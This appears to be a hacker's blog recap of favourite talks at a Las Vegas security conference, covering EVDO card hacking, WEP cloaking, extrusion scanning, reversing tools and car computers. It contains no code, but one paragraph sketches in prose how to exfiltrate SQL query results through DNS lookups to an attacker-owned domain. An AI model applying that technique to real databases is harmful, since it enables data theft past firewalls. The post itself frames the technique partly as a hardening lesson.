Spot the Reporter anyone? It was another good adventure out in Las Vegas last week. Obviously the best part of any con is the people who are there. It was great seeing old friends and meeting new ones. I typically ask everyone “what was the best presentation you saw?” I thought I’d turn the table and give my view on that question. I know I missed a few good ones (it would be hard to make a 9am talk in Las Vegas even if it were held in my hotel room) but here are the highlights from what I did catch.

EVDO Hacking (King Tuna) - I suspect most people found this talk more entertaining than educational and King Tuna wins for best Ricky Gervais character impersonation. I found myself cringing in my seat for his unfortunate first time presenter problems, however we walked away with two kick ass pieces of info. First, you can read files from your EVDO card with BitPim (or QPST if you have loose morals and bittorrent skillz) and the Kyocera KPC650 card’s firmware is unlocked. Tasty.

SQL out-of-band Channeling (Patrik Karlsson) -No SQL error messages being returned? No problem. I’ll just take my query results over DNS. Yup, that’s right. Over DNS (I had to double check I hadn’t just walked in the Kaminsky talk.) The short version is there’s a number of database functions that will trigger DNS lookups. Craft the “hostnames” which are really the data and request them from a domain for which the attacker owns. Check the slides cause it goes into depth on properly encoding and breaking up the data. This would get through just about any network architecture and firewall egress filter I’ve seen. Can you live without DNS lookups on your database server? Probably. Time to add that to your hardening checklists.

WEP Cloaking Exposed (Vivek Ramachandran) - Hopefully just reading the explanation of “WEP Cloaking” will make your security stomach feel like you’ve had sushi straight from the Chicago river. But if you’ve ever seen sales people, you know they can suck down anything and then try to sell it on the way out. Thankfully the Air Tight group came to the table with strong examples of how flawed this security through obscurity “WEP Cloaking” idea is. While the rest of us don’t have a tool just yet to automate the same process which was shown, it’s only a matter of time. A point to remember, they said, was that a WEP cloaking/chaffing product still won’t make a wireless WEP network PCI compliant.

Extrusion Scanning (Matt Richards) - In the past, giving a customer a report about how many different ways we could tunnel data out of their internal network would be equivalent to giving them a graph about how wet water is. The good news is we have started to see customers that are taking the steps towards decently restricting out bound connections. Hopefully the talked about eescan tool maybe a way of quickly testing this out from an internal network.

Active Reversing/Virtual World Hacking (Greg Hoglund) - I’m so not logging on to WoW if this guy is online. Caught sections of both Greg Hoglund talks and was impressed with the ideas and examples. This is not my normal cup of h4×0r tea, so I’m not sure how invovative these tools and techniques are, but I like the over all idea. The more someone can understand and trace a program without having to go break point by break point in IDA Pro sounds like a good idea to me. Lets lower the bar and get more people disassembling. Greg demo’ed some HBGary tools to quickly and easily isolate parts of a binary program that contain functions of interest.

Hack Your Car (higB) - Sure, may have a little bias here, but still was one of my favorite talks. You own the car, shouldn’t you own the computer on it? Pretty shocking to hear emissions tests often rely just on the info the computer tells it and not on actual tailpipe output. Maybe we need to take this talk to an EPA convention next.

-b3nn